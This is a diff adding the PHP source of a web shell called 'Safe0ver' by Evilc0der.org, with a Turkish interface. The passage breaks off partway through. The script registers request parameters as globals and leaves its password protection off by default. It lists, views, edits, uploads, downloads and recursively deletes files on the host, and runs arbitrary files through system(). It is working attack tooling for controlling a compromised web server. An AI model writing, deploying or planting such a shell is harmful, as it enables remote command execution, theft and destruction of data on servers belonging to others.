+/* I added this to ensure the script will run correctly...
+   Please enter the Script's filename in this variable. */   
+$SFileName=$PHP_SELF;
+
+/* uncomment the two following variables if you want to use http
+   authentication. This will password protect your PHPShell */
+//$http_auth_user = "phpshell";    /* HTTP Authorisation username, uncomment if you want to use this */
+//$http_auth_pass = "phpshell";    /* HTTP Authorisation password, uncomment if you want to use this */        
+
+error_reporting(0);
+$PHPVer=phpversion();
+$isGoodver=(intval($PHPVer[0])>=4);
+$scriptTitle = "Safe0ver";
+$scriptident = "$scriptTitle By Evilc0der.org";
+
+$urlAdd = "";
+$formAdd = "";
+
+function walkArray($array){
+  while (list($key, $data) = each($array))
+    if (is_array($data)) { walkArray($data); }
+    else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
+}
+
+if (isset($_PUT)) walkArray($_PUT);
+if (isset($_GET)) walkArray($_GET);
+if (isset($_POST)) walkArray($_POST);
+
+
+$pos = strpos($urlAdd, "s=r");
+if (strval($pos) != "") {
+$urlAdd= substr($urlAdd, 0, $pos);
+}
+
+$urlAdd .= "&s=r&";
+
+if (empty($Pmax))
+    $Pmax = 125;   /* Identifies the max amount of Directories and files listed on one page */
+if (empty($Pidx)) 
+    $Pidx = 0;
+
+$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
+$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+
+$scriptdate = "7 Subat 2007";
+$scriptver = "Bet@ Versiyon";
+$LOCAL_IMAGE_DIR = "img";
+$REMOTE_IMAGE_URL = "img";
+$img = array(
+                "Edit"         => "edit.gif",
+                "Download"     => "download.gif",
+                "Upload"     => "upload.gif",
+                "Delete"     => "delete.gif",
+                "View"         => "view.gif",
+                "Rename"     => "rename.gif",
+                "Move"         => "move.gif",
+                "Copy"         => "copy.gif",
+                "Execute"     => "exec.gif"
+            );
+
+while (list($id, $im)=each($img))
+    if (file_exists("$LOCAL_IMAGE_DIR/$im"))
+        $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
+    else
+         $img[$id] = "[$id]";
+
+
+
+
+/* HTTP AUTHENTICATION */
+
+    if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass)  ||  (($logoff==1) && $noauth=="yes")  )   { 
+        setcookie("noauth","");
+        Header( "WWW-authenticate:  Basic realm=\"$scriptTitle $scriptver\"");
+        Header( "HTTP/1.0  401  Unauthorized");
+        echo "Your username or password is incorrect";
+        exit ;
+                 
+    } 
+
+function buildUrl($display, $url) {
+        global $urlAdd;
+        $url = $SFileName . "?$urlAdd$url";
+    return "<a href=\"$url\">$display</a>";
+}
+
+function sp($mp) {
+    for ( $i = 0; $i < $mp; $i++ )
+        $ret .= "&nbsp;";
+    return $ret;
+}
+
+function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr);  } 
+
+function Mydeldir($Fdir) {
+    if (is_dir($Fdir)) {
+        $Fh=@opendir($Fdir);
+         while ($Fbuf = readdir($Fh))
+             if (($Fbuf != ".") && ($Fbuf != ".."))
+                Mydeldir("$Fdir/$Fbuf");
+        @closedir($Fh);
+                return rmdir($Fdir);
+    }    else {
+        return unlink($Fdir);
+    }
+}
+
+
+function arrval ($array) {
+list($key, $data) = $array;
+return $data;
+}
+
+function formatsize($insize) {  
+    $size = $insize;
+    $add = "B";
+    if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "KB";
+     }
+     if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "MB";
+     }
+     if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "GB";
+     }
+     if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "TB";
+     }
+     return "$size $add";
+}
+
+if ($cmd != "downl") {
+    ?>
+
+<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?>  -->
+<HTML>
+ <HEAD>
+  <STYLE>
+  <!--
+    A{ text-decoration:none; color:navy; font-size: 12px }
+    body {
+	font-size: 12px;
+	font-family: arial, helvetica;
+	scrollbar-width: 5;
+	scrollbar-height: 5;
+	scrollbar-face-color: white;
+	scrollbar-shadow-color: silver;
+	scrollbar-highlight-color: white;
+	scrollbar-3dlight-color:silver;
+	scrollbar-darkshadow-color: silver;
+	scrollbar-track-color: white;
+	scrollbar-arrow-color: black;
+	background-color: #CCCCCC;
+    }
+    Table { font-size: 12px; }
+    TR{ font-size: 12px; }
+    TD{
+	font-size: 12px;
+	font-family: arial, helvetical;
+	BORDER-LEFT: black 0px solid;
+	BORDER-RIGHT: black 0px solid;
+	BORDER-TOP: black 0px solid;
+	BORDER-BOTTOM: black 0px solid;
+	COLOR: black;
+	background: #CCCCCC;
+    }
+    .border{       BORDER-LEFT: black 1px solid;
+            BORDER-RIGHT: black 1px solid;
+            BORDER-TOP: black 1px solid;
+            BORDER-BOTTOM: black 1px solid;
+          }
+    .none  {       BORDER-LEFT: black 0px solid;
+            BORDER-RIGHT: black 0px solid;
+            BORDER-TOP: black 0px solid;
+            BORDER-BOTTOM: black 0px solid;
+          }
+    .inputtext {
+            background-color: #EFEFEF;
+            font-family: arial, helvetica;
+            border: 1px solid #000000;
+            height: 20;
+    }
+    .lighttd {       background: #F8F8F8;
+    }
+    .darktd {        background: #CCCCCC;
+    }
+    input { font-family: arial, helvetica;
+    }
+    .inputbutton {
+                        background-color: #CCCCCC;
+            border: 1px solid #000000;
+            border-width: 1px;
+            height: 20;
+    }
+    .inputtextarea {
+            background-color: #CCCCCC;
+            border: 1px solid #000000;
+            scrollbar-width: 5;
+            scrollbar-height: 5;
+            scrollbar-face-color: #EFEFEF;
+            scrollbar-shadow-color: silver;
+            scrollbar-highlight-color: #EFEFEF;
+            scrollbar-3dlight-color:silver;
+            scrollbar-darkshadow-color: silver;
+            scrollbar-track-color: #EFEFEF;
+            scrollbar-arrow-color: black;
+    }
+    .top { BORDER-TOP: black 1px solid; }
+    .textin { BORDER-LEFT: silver 1px solid;
+              BORDER-RIGHT: silver 1px solid;
+           BORDER-TOP: silver 1px solid;
+              BORDER-BOTTOM: silver 1px solid;
+              width: 99%; font-size: 12px; font-weight: bold; color: Black;
+            }
+    .notop { BORDER-TOP: black 0px solid; }
+    .bottom { BORDER-BOTTOM: black 1px solid; }
+    .nobottom { BORDER-BOTTOM: black 0px solid; }
+    .left { BORDER-LEFT: black 1px solid; }
+    .noleft { BORDER-LEFT: black 0px solid; }
+    .right { BORDER-RIGHT: black 1px solid; }
+    .noright { BORDER-RIGHT: black 0px solid; }
+    .silver{ BACKGROUND: #CCCCCC; }
+body,td,th {
+	color: #660000;
+}
+a:link {
+	color: #000000;
+	text-decoration: none;
+}
+a:hover {
+	color: #00FF00;
+	text-decoration: none;
+}
+a:active {
+	color: #666666;
+	text-decoration: none;
+}
+a:visited {
+	text-decoration: none;
+}
+.style5 {
+	color: #660000;
+	font-weight: bold;
+}
+  -->
+  </STYLE>
+  <TITLE><?php echo $SFileName ?></TITLE>
+ <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
+ <body topmargin="0" leftmargin="0">
+ <div style="position: absolute; background: #CCCCCC; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
+ <table nowrap width=100% border="0" cellpadding="0" cellspacing="0">
+   <tr>
+     <td width="100%" class="silver border"><center>
+         <strong> <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font> </strong>
+     </center></td>
+   </tr>
+ </table>
+ <table width=100% height="100%" NOWRAP border="0">
+  <tr NOWRAP>
+   <td width="100%" NOWRAP><br>
+
+    <?php
+}
+
+if ( $cmd=="dir" ) {
+      $h=@opendir($dir);
+     if ($h == false) {
+          echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
+                Klasör Listelenemiyor!Lütfen Bypass Bölümünü Deneyin.<br>".sp(3)."\n
+                Script Gecisi Tamamlayamadi!
+                <br><br>".sp(3)."\n
+                Klasöre Girmek Icin yetkiniz Olduguna emin Olunuz...
+                <br><br></font>\n\n\n\n";
+     }
+        if (function_exists('realpath')) {
+        $partdir = realpath($dir);
+    }
+        else {
+        $partdir = $dir;
+    }
+     if (strlen($partdir) >= 100) {
+         $partdir = substr($partdir, -100);
+         $pos = strpos($partdir, "/");
+         if (strval($pos) != "") {
+             $partdir = "<--   ...".substr($partdir, $pos);
+         }
+        $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
+        $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); 
+    $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+     }
+    ?>
+      <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
+         <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
+      <tr>
+       <td width="100%" class="silver border">
+        <center>&nbsp;Safe0ver-Server File Browser...&nbsp;</center>
+       </td>
+      </tr>
+     </table>
+       <br>
+     <table width="100%" border="0" cellpadding="0" cellspacing="0">
+      <tr>
+           <td class="border nobottom noright">
+            &nbsp;Listeliyor:&nbsp;
+      </td>
+          <td width="100%" class="border nobottom noleft">
+           <table width="100%" border="0" cellpadding="1" cellspacing="0">
+             <tr>
+              <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
+              <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GiT<b></a>&nbsp;<center></td>
+             </tr>
+            </table>
+            
+      </td>
+     </tr>
+    </table>
+  <!--    </form>   -->
+        <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
+         <tr>
+      <td width="100%" NOWRAP class="silver border">
+       &nbsp;Dosya Adi&nbsp;
+      </td>
+          <td NOWRAP class="silver border noleft">
+       &nbsp;Yapilabilecekler&nbsp;&nbsp;
+      </td>
+          <td NOWRAP class="silver border noleft">
+       &nbsp;Boyut&nbsp;
+      </td>
+          <td width=1 NOWRAP class="silver border noleft">
+       &nbsp;Yetkiler&nbsp;
+      </td>
+          <td NOWRAP class="silver border noleft">
+       &nbsp;Son Düzenleme&nbsp;
+      </td>
+     <tr>
+    <?php
+
+
+          /* <!-- This whole heap of junk is the sorting section... */
+
+     $dirn     = array();
+     $filen     = array();
+     $filesizes    = 0;
+     while ($buf = readdir($h)) {
+        if (is_dir("$dir/$buf"))
+            $dirn[] = $buf;
+            else 
+             $filen[] = $buf;
+        }         
+        $dirno     = count($dirn) + 1;
+         $fileno    = count($filen) + 1;
+
+          function mycmp($a, $b){
+            if ($a == $b) return 0;
+            return (strtolower($a) < strtolower($b)) ? -1 : 1;
+        }
+
+        if (function_exists("usort")) {
+            usort($dirn, "mycmp");
+            usort($filen, "mycmp");
+        }
+        else {
+            sort ($dirn);
+             sort ($filen);
+         }
+    reset ($dirn);
+     reset ($filen);
+     if (function_exists('array_merge')) {
+        $filelist = array_merge ($dirn, $filen);
+    }
+     else {
+        $filelist = $dirn + $filen;
+    }
+
+    
+    if ( count($filelist)-1 > $Pmax ) {
+        $from = $Pidx * $Pmax;
+        $to = ($Pidx + 1) * $Pmax-1;
+        if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
+            $to = count($filelist) - 1;
+        if ($to > count($filelist)-1)
+            $to = count($filelist)-1;
+        $Dcontents = array();
+        For ($Fi = $from; $Fi <= $to; $Fi++) {
+            $Dcontents[] = $filelist[$Fi];    
+        }
+
+    }
+    else {
+        $Dcontents = $filelist;
+    }
+    
+     $tdcolors = array("lighttd", "darktd");
+
+     while (list ($key, $file) = each ($Dcontents)) {
+          if (!$tdcolor=arrval(each($tdcolors))) {
+        reset($tdcolors);
+        $tdcolor = arrval(each($tdcolors));      }
+                   
+         if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
+                      /* <!-- Dirname --> */
+            echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
+                  /* <!-- Actions --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
+                 /* <!-- Rename --> */
+            if ( ($file != ".") && ($file != "..") )
+                echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+                 /* <!-- Delete --> */
+            if ( ($file != ".") && ($file != "..") )
+                echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+                /* <!-- End of Actions --> */
+            echo "&nbsp;&nbsp;</center></td>\n";
+                  /* <!-- Size --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
+                 /* <!-- Attributes --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+             echo "<strong>D</strong>";
+                if ( @is_readable("$dir/$file") ) {
+                   echo "<strong>R</strong>";
+             }
+             if (function_exists('is_writeable')) {
+                if ( @is_writeable("$dir/$file") ) {
+                     echo "<strong>W</stong>";
+                 }
+            }
+             else {
+                    echo "<strong>(W)</stong>";
+              }
+              if ( @is_executable("$dir/$file") ) {
+                 echo "<Strong>X<strong>";
+             }
+             echo "&nbsp;&nbsp;</td>\n";
+                 /* <!-- Date --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+             echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+             echo "</td>";
+            echo "</tr>\n";
+
+            }
+          else { /* <!-- Then it must be a File... --> */
+                     /* <!-- Filename --> */
+            if ( @is_readable("$dir/$file") )
+                 echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
+              else
+                  echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
+                                 /* <!-- Actions --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
+                 /* <!-- Rename --> */
+            echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+                  /* <!-- Edit --> */
+            if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+                 echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
+                   /* <!-- Copy --> */
+             echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
+                  /* <!-- Move --> */
+            if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+                     echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
+                    /* <!-- Delete --> */
+            echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+                 /* <!-- Download --> */
+            echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
+                 /* <!-- Execute --> */
+            if ( @is_executable("$dir/$file") )
+                 echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
+                    /* <!-- End of Actions --> */
+            echo sp(2)."</center></td>\n";
+                 /* <!-- Size --> */
+            echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
+             $size = @filesize("$dir/$file");
+             If ($size != false) {
+                    $filesizes += $size;
+                echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
+            }
+            else
+                echo "&nbsp;&nbsp;<strong>0 B<strong>";
+             echo "&nbsp;&nbsp;</td>\n";
+
+                 /* <!-- Attributes --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+
+             if ( @is_readable("$dir/$file") )
+                 echo "<strong>R</strong>";
+               if ( @is_writeable("$dir/$file") )
+                 echo "<strong>W</stong>";
+               if ( @is_executable("$dir/$file") )
+                 echo "<Strong>X<strong>";
+               if (function_exists('is_uploaded_file')){
+                 if ( @is_uploaded_file("$dir/$file") )
+                     echo "<Strong>U<strong>";
+             }
+             else {
+                echo "<Strong>(U)<strong>";
+            }
+             echo "&nbsp;&nbsp;</td>\n";
+                 /* <!-- Date --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+             echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+             echo "</td>";
+             echo "</tr>\n";
+         }
+      }
+
+        echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
+      echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Klasör,&nbsp;".@count ($filen)."&nbsp;Dosya&nbsp;&nbsp;\n";
+      echo "</td><td NOWRAP class=\"silver border noleft\">\n";
+      echo "&nbsp;&nbsp;Toplam Dosya Boyutu:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
+    
+    function printpagelink($a, $b, $link = ""){
+        if ($link != "") 
+            echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
+        else
+            echo "<b>| $a - $b |</b>";
+    }
+        
+    if ( count($filelist)-1 > $Pmax ) {
+        echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
+        $Fi = 0;
+        while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
+            $from = $Fi*$Pmax;
+            while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+            $to = ($Fi + 1) * $Pmax - 1;
+            if ($Fi == $Pidx)
+                $link="";
+            else 
+                $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+            printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
+            echo "&nbsp;&nbsp;&nbsp;";
+            $Fi++;
+        }
+        $from = $Fi*$Pmax;
+        while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+        $to = count($filelist)-1;
+        if ($Fi == $Pidx)
+            $link="";
+        else 
+            $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+        printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);        
+        
+    
+        echo "</center></td></tr></table></td></tr>";
+    }
+
+
+        echo "</table>\n<br><table NOWRAP>";
+
+      if ($isGoodver) {
+        echo "<tr><td class=\"silver border\">&nbsp;<strong>PHP Versiyonu:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
+    }
+     else {
+        echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
+    }
+              /* <!-- Other Actions --> */
+       echo "<tr><td class=\"silver border\">&nbsp;<strong>Diger Islemler:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
+      echo "<td>&nbsp;<b>".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+                         buildUrl( "| Yeni Klasör |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+                 buildUrl( "| Dosya Yükle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
+        echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
+      echo "<tr><td class=\"silver border\">&nbsp;<strong>IP Adresin:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
+      echo "<tr><td class=\"silver border\">&nbsp;<strong>Bulundugun Klasör:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
+      echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Semboller:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
+      echo "<table NOWRAP>";
+        echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Klasör.</td></tr>\n";
+       echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Okunabilir.</td></tr>\n";
+      echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Yazilabilir.</td></tr>\n";
+      echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Komut Calistirilabilir.</td></tr>\n";
+      echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
+      echo "</table></td>";
+     echo "</table>";
+     echo "<br>";
+         @closedir($h);
+  }
+  elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
+     echo system("$file");
+ }
+elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
+    echo "<center><table><tr><td NOWRAP>" ;
+     if ($auth == "yes") {
+        if (Mydeldir($file)==false) {
+             echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
+          }
+         else {
+             echo "Successfully removed \"$file\"<br>";
+         }
+         echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
+    }
+     else {
+        echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+        <input type=\"hidden\" name=\"cmd\" value=\"deldir\">
+         <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+         <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+         <input type=\"hidden\" name=\"file\" value=\"$file\">
+         <input type=\"hidden\" name=\"auth\" value=\"yes\">
+         <input type=\"submit\" value=\"Yes\"></form>
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+    <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+    <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+    <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+        }
+     echo "</td></tr></center>";
+}
+ elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */    echo "<center><table><tr><td NOWRAP>" ;
+     if ($auth == "yes") {
+        if (@unlink($file)==false) {
+             echo "Could not remove \"$file\"<br>";
+          }
+         else {
+             echo "Successfully removed \"$file\"<br>";
+         }
+        echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
+        }
+     else {
+           echo "Are you sure you want to delete \"$file\" ?
+          <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+         <input type=\"hidden\" name=\"cmd\" value=\"delfile\">
+         <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+         <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+         <input type=\"hidden\" name=\"file\" value=\"$file\">
+         <input type=\"hidden\" name=\"auth\" value=\"yes\">
+
+         <input type=\"submit\" value=\"Yes\"></form>
+           <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+    <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+    <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+    <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+        }
+     echo "</td></tr></center>";
+}
+elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
+    echo "<center><table><tr><td NOWRAP>";
+     $i = 1;
+     while (file_exists("$lastdir/newfile$i.txt"))
+         $i++;
+     $file = fopen("$lastdir/newfile$i.txt", "w+");
+     if ($file == false)
+         echo "Could not create the new file...<br>";
+     else
+         echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
+         echo "
+               <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+            <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+            <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+            <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
+            </form></center>
+             </td></tr></table></center>           ";
+    }
+elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
+    echo "<center><table><tr><td NOWRAP>" ;
+     $i = 1;
+     while (is_dir("$lastdir/newdir$i"))
+          $i++;
+     $file = mkdir("$lastdir/newdir$i", 0777);
+     if ($file == false)
+         echo "Could not create the new directory...<br>";
+     else
+         echo "Successfully created: \"$lastdir/newdir$i\"<br>";
+     echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+        <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+        <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+        <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
+        </form></center></td></tr></table></center>";
+}
+elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
+    $contents = "";
+    $fc = @file( $file );
+      while ( @list( $ln, $line ) = each( $fc ) ) {
+          $contents .= htmlentities( $line ) ;
+     }
+     echo "<br><center><table><tr><td NOWRAP>";
+    echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+    echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
+    echo "<strong>EDIT FILE: </strong>$file<br>\n";
+    echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
+    echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
+    echo "<input type=\"submit\" value=\"Save\">";
+    echo "</form>";
+    echo "</td></tr></table></center>";
+}
+elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
+    $fo = fopen($file, "w");
+    $wrret = fwrite($fo, stripslashes($contents));
+    $clret = fclose($fo);
+}
+elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
+    $downloadfile = urldecode($file);
+    if (function_exists("basename"))
+            $downloadto = basename ($downloadfile);
+    else
+        $downloadto = "download.ext";
+    if (!file_exists("$downloadfile"))
+        echo "The file does not exist";
+    else {
+        $size = @filesize("$downloadfile");
+        if ($size != false) {
+            $add="; size=$size";
+        }            
+        else {
+            $add="";
+        }
+         header("Content-Type: application/download");
+        header("Content-Disposition: attachment; filename=$downloadto$add");
+        $fp=fopen("$downloadfile" ,"rb");
+        fpassthru($fp);
+        flush();
+    }
+}
+elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */ 
+       ?>
+    <center>
+     <table>
+      <tr>
+       <td NOWRAP>
+            Dosya Yükleme Sekmesine Tikladiniz !
+        <br> Eger Yüklemek istediginiz Dosya mevcut ise üzerine Yazilir.<br><br>
+      <form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
+             <input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
+             <input type="hidden" name="cmd" value="uploadproc">
+             <input type="hidden" name="dir" value="<?php echo $dir ?>">
+             <input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
+             <input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
+             Dosya Yükle:<br>
+             <input size="75" name="userfile" type="file"><br>
+             <input type="submit" value="Yükle">
+      </form>
+        <br>
+         <form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
+            <input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
+            <input type="hidden" name="dir" value="<?php echo $lastdir ?>">
+            <input tabindex="0" type="submit" value="Iptal">
+        </form>
+    </td>
+   </tr>
+ </table>
+    </center>
+
+     <?php
+}
+elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
+    echo "<center><table><tr><td NOWRAP>";
+    if (file_exists($userfile))
+        $res = copy($userfile, "$dir/$userfile_name");
+    echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
+         if ($res) {
+        echo "Basariyla Yüklendi \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
+        echo "Yüklenen Dosya Adi: \"$userfile_name\".\n<br>Dosya Adi: \"$userfile\".\n<br>";
+        echo "Dosya Boyutu: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
+    }
+    else {
+        echo "Yüklenemedi...";
+    }
+    echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
+    echo "<br><br></td></tr></table></center>";
+}
+elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
+        echo "<hr>"; 
+    $fc = @file( $file );      while ( @list( $ln, $line ) = each( $fc ) ) {
+          echo spacetonbsp(@htmlentities($line))."<br>\n";
+      }
+    echo "<hr>";
+}
+elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
+         if (function_exists('is_dir')) {
+         if (is_dir("$oldfile")) {
